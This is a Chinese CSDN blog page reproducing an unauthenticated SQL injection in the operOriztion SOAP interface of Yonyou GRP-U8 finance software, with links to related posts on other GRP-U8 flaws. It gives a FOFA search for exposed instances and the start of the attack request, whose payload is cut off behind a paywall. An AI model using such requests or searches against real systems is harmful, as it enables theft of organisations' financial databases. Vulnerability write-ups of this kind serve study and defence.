【漏洞复现】用友GRP-U8 operOriztion SQL注入漏洞

最新推荐文章于 2024-05-15 16:39:46 发布
最新推荐文章于 2024-05-15 16:39:46 发布
阅读量98 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 科技 安全 php 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137974280
版权

0x01 产品简介

用友GRP-U8是一款功能全面的会计软件,适用于企业的财务管理需求。它提供了财务核算、财务分析、资产管理等全面的财务管理功能,实现了会计凭证自动生成、科目余额表生成等功能,大大简化了手动处理的繁琐过程。此外,该软件还具备数据备份、恢复等安全措施,确保企业财务数据的安全性。

0x02 漏洞概述

用友GRP-U8 /services/operOriztion接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。

0x03 测绘语句

fofa: app="用友-GRP-U8"

0x04 漏洞复现

​
POST /services/operOriztion HTTP/1.1

Host:

Content-Type: text/xml;charset=UTF-8

SOAPAction: ""

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">

<soapenv:Header/>

<soapenv:Body>

&l
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友GRP-U8 operOriztion SQL注入漏洞复现
0xSec
04-18 334
用友GRP-U8R10行政事业内控管理软件/services/operOriztion 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3362
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
soapui调用webservice入参报文
https://blog.csdn.net/sinat_36710456
12-20 1553
soapui 入参报文: <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http:...
玩转CodeQLpy之用友GRP-U8漏洞挖掘
C20220511的博客
03-09 1199
通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题,目前支持对SprintBoot的jar包,SpringMVC的war包,直接下载的源码文件夹,maven项目源码等方式进行自动化代码审计,详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞,包括但不限于反序列化,任意文件上传,任意文件删除,SQL注入,SSRF,XSS等,如图2.2所示。利用CodeQLpy生成的数据库,结合CSV文件中保存的有结果的插件名称,可以在VS中复现漏洞查找过程。
用友GRP-U8 SQL注入漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1494
用友GRP-U8 SQL注入漏洞复现
用友 GRP-U8 存在sql注入漏洞复现
zkaqlaoniao的博客
10-30 1171
Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者info:name: 用友GRP-U8 License Check漏洞requests:path:kjnd=1';matchers:dsl:还没看够?可以关注~免费领取安全学习资料包!(私聊进群一起学习,共同进步)渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
用友GRP-U8存在SQL注入漏洞复现
2301_80115097的博客
10-26 346
fofa:app=”用友-GRP-U8用友GRP-U8存在SQL注入漏洞文件名为bx_historyDataCheck.jsp。
用友 GRP-U8 sqcxIndex SQL 注入漏洞
Keepb1ue的博客
03-25 327
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
用友GRP-U8-行政事业单位财务管理软件操作手册.pdf
03-30
用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-行政事业单位财务管理软件操作手册.pdf用友GRP-U8-...
GRP-U8行政事业内控管理软件V11.21安装教程
05-28
鉴于很多新手朋友不会安装GRP-U8行政事业内控管理软件,故而出此视频教程!仅供参考!
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
11-04
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
用友政务GRP-U8,近期常见问题85例解决方法
03-26
1.查询科目明细账会出现很多重复记录,2.查询明细账未按照凭证号排序3.自定义凭证打印,不打印上级科目名称:13.打开凭证箱慢15.期初余额装入中导入Excel文件报错,17.以前是双凭证模式,怎么调整为单凭证模式等等85...
GRP-U8管理软件行政事业版数据库
01-24
GRP-U8管理软件行政事业版数据库中表非常多,函数非常多,但是仔细分析以后有用的仅仅只有四张表。
功能安全如何在公司顺利开展?-亚远景科技
yayuanjingkeji的博客
05-14 212
随着汽车技术的不断发展,汽车系统的复杂性和交互性大幅增加,功能安全成为确保驾驶员、乘客及行人安全的关键。本场功能安全线上会议,亚远景为汽车行业的相关人员准备了以下内容:1.功能安全简介及认证概念 2.为什么车辆行业需要进行功能安全开发 3.企业如何进行功能安全开发的实施 4.企业在功能安全开发遇见的常见问题
易图讯科技三维电子沙盘系统
QQ_2801061513的博客
05-12 198
深圳易图讯科技有限公司(www.3dgis.top)创立于2013年,专注二三维地理信息、三维电子沙盘、电子地图、虚拟现实、大数据、物联网和人工智能技术研发,获得20多项软件著作权和软件检测报告,成功交付并实施了1000多个项目,广泛应用于部队、武警、武装部、公安、应急、消防、安全生产、森林防火、石油石化、科研教育、国防动员、人民防空等行业。三维地理信息电子沙盘集多项先进技术于一体,为军事、公安、应急、消防、森林防火、人民武装、国防动员、人民防空等领域提供强大决策支持和指挥调度能力。
大模型时代下的先行者:景联文科技引领数据标注新时代
最新发布
weixin_55551028的博客
05-15 398
针对客户的多样化需求,提供定制化数据标注解决方案,打破数据应用的界限,实施全面质量把控、验收流程,并开辟客户直接验收通道,灵活导出多样格式标注成果,保证项目的高标准、高效、高速完成。景联文科技已成功为全球范围内的数千家智能驾驶、智能安防、智慧医疗、智能教育、智慧金融、智能客服、新零售等行业的领先企业和高校科研机构提供海量且优质的AI训练数据,赋能人工智能未来。创新利用SAM算法驱动的标注平台,显著提升了标注效率,并积极探索自动标注技术,根据标注结果调整模型进行标注,提高数据标注精准度。
杰发科技AC7801——ADC之Bandgap和内部温度计算
刘恩东的博客
05-11 468
温度曲线斜率1.692,单位是mV/℃。 25℃时候电压是0.72V。
用友GRP-U8高校内控管理软件 漏洞
07-28
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值